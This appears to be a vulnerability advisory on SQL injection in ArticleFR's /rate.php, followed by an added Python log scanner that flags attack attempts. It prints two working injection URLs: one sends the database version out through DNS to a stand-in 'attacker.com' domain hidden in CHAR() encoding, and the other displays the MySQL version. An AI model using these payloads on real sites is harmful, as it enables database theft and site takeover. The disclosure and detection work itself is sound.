High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in ArticleFR, which can be exploited to perform SQL injection attacks and gain complete control over a vulnerable website.
The vulnerability exists due to insufficient sanitization of the "id" HTTP GET parameter passed to the "/rate.php" script when the "act" HTTP GET parameter is set to either "get" or "set". A remote attacker can send a specially crafted HTTP GET request and execute arbitrary SQL commands in the application's database.
The following exploitation example demonstrates the vulnerability when the "act" HTTP GET parameter is set to the value "get". The PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the version() (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):
http://[host]/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202
Below is another exploitation example, which displays the version of the MySQL server when the "act" HTTP GET parameter is set to the value "set":
http://[host]/rate.php?act=set&id=0%20union%20select%201,version%28%29,3,4%20--%202
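
For defenders reviewing web server logs, the following is an added example (not part of the original advisory and not ArticleFR code) that flags requests to "/rate.php" with "act" set to "get" or "set" whose "id" value is not a plain decimal integer after URL decoding. It assumes Common Log Format and assumes that legitimate "id" values are integers; the log lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Common Log Format (not from a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2015:10:00:01 +0000] "GET /rate.php?act=get&id=42 HTTP/1.1" 200 17
198.51.100.9 - - [10/Jan/2015:10:00:05 +0000] "GET /rate.php?act=set&id=0%20union%20select%201,version%28%29,3,4 HTTP/1.1" 200 31
198.51.100.9 - - [10/Jan/2015:10:00:09 +0000] "GET /rate.php?act=get&id=7&id=0%20union%20select%201 HTTP/1.1" 200 17
203.0.113.4 - - [10/Jan/2015:10:00:12 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900
203.0.113.4 - - [10/Jan/2015:10:00:15 +0000] "GET /rate.php?act=get HTTP/1.1" 200 0
"""

# client address, then the method and request target from the quoted request line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

# Assumption: a legitimate "id" is a short decimal integer.
VALID_ID_RE = re.compile(r"[0-9]{1,10}")


def suspicious_rate_requests(log_text):
    """Return (line_number, client, decoded_id) for each flagged request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, _method, target = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/rate.php"):
            continue
        # parse_qs URL-decodes values and keeps every repeated parameter,
        # so a benign first "id" cannot hide a malformed second one.
        params = parse_qs(url.query, keep_blank_values=True)
        if not any(act in ("get", "set") for act in params.get("act", [])):
            continue
        bad = [v for v in params.get("id", []) if not VALID_ID_RE.fullmatch(v)]
        if bad:
            findings.append((lineno, client, bad[0]))
    return findings


if __name__ == "__main__":
    for finding in suspicious_rate_requests(SAMPLE_LOG):
        print(finding)
```

The same integer check applied server-side before the value reaches the query, together with parameterized statements, addresses the root cause; the log scan only surfaces attempts after the fact.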